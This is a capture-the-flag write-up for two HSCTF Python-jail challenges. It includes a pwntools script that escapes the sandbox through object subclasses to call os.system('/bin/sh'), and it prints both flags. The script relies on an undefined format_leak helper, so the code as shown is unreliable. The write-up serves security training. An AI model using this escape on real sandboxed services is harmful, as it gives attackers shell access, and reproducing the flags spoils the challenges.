Misc

fast-forward (26 solves)

Description

Everyone always says Python is too slow—so let's speed it up!

nc fast-forward.hsctf.com 1337

Solution

In this case, i just focused about function or variable limitation. Through trial and error i found that lambda can "hide" function name and variable name.

To solve this challenge i use lambda to find out class and function that we can use for RCE. In this case we can found there is os._wrap_close by enumerating each index in subclasses. Here is the script i used to automate the process and trigger shell.

from pwn import *

def send(data):
	r.recvuntil(b'> ')
	r.sendline(data)
	return r.recvline()

def exploit():
	payload = "print('_wrap_close' in (lambda: str((1).__class__.__base__.__subclasses__()[{}]))())"
	for i in range(0xff):
		resp = send(format_leak(payload.format(i)))
		print(i, resp)
		if(resp.strip() == b'True'):
			break
	payload = f"(lambda: print((1).__class__.__base__.__subclasses__()[{i}].__init__.__globals__['system']('/bin/sh')))()"
	r.recvuntil(b'> ')
	r.sendline(payload.encode())

r = remote("fast-forward.hsctf.com", 1337)
exploit()
r.interactive()

Flag : flag{it_would_be_a_shame_if_there_were_a_bunch_of_numbers_at_the_end_2846880189}

fast-forward-v2 (22 solves)

Description

I made Python even faster than before!

nc fast-forward-v2.hsctf.com 1337

Solution

For fast-forward-v2 i used the same exploit as fast-forward :>

Flag : flag{one_day_i_will_write_a_pyjail_without_unintended_solutions_3421670241}